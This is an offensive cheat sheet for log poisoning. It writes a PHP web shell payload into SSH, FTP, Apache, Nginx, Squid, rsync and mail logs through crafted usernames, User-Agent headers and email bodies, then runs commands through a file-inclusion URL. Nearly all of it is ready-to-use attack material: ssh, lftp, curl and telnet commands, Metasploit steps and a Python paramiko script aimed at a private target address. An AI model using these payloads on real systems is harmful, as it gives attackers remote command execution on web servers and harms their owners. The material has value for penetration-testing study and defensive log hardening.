Log Poisoning
Services
SSH
ssh '<?php system($_GET["cmd"]); ?>'@192.168.1.2
http://192.168.1.2/file.php?file=/var/log/auth.log&cmd=id
ERROR (remote username contains invalid characters)
Metasploit
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME <?php system($_GET["cmd"]); ?>
msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD blahblah
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.2 #<IPv4/IPv6>
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 192.168.1.2:22 - Starting bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Python
#!/usr/bin/env python3
# encoding: utf-8
import paramiko
def run():
host = '192.168.1.2' # IPv4/IPv6
username = '<?php system($_GET["cmd"]); ?>'
password = 'blahblah'
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(
host,
username=username,
password=password,
timeout=5,
auth_timeout=5
)
except paramiko.AuthenticationException:
print("Auth failed")
except paramiko.SSHException as e:
print("Error SSH:", e)
except Exception as e:
print("Error general:", e)
finally:
ssh.close()
run()
FTP
lftp -u '<?php system($_GET["cmd"]); ?>', 192.168.1.2
http://192.168.1.2/file.php?file=/var/log/vsftpd.log&cmd=id
HTTP (User-Agent)
Apache2
Linux
# User-Agent: <?php system($_GET['cmd']); ?>
curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://192.168.1.2"
http://192.168.1.2/file.php?file=/var/log/apache2/access.log&cmd=id
Windows
XAMPP
# User-Agent: <?php system($_GET['cmd']); ?>
curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://192.168.1.2"
http://192.168.1.2/file.php?file=c:\xampp\apache\logs\access.log
Nginx
# User-Agent: <?php system($_GET['cmd']); ?>
curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://192.168.1.2"
http://192.168.1.2/file.php?file=/var/log/nginx/access.log&cmd=id
Squid
# User-Agent: <?php system($_GET['cmd']); ?>
curl -sX GET --proxy "http://192.168.1.2:3128" "http://127.0.0.1:80" -A '<?php system($_GET["cmd"]); ?>'
http://192.168.1.2/file.php?file=/var/log/squid/access.log&cmd=id
Rsync
rsync 192.168.1.2::'<?php system($_GET["cmd"]); ?>'
http://192.168.1.2/file.php?file=/var/log/rsyncd.log&cmd=id
SMTP
Mail Poisoning
❯ telnet 192.168.1.95 25
VRFY cain
MAIL FROM: cain
RCPT TO: abel
DATA
Subject: LOG POISONING
<?php system($_GET['cmd']); ?>
.
QUIT
http://192.168.1.2/emailreader.php?id=/var/mail/cain&cmd=id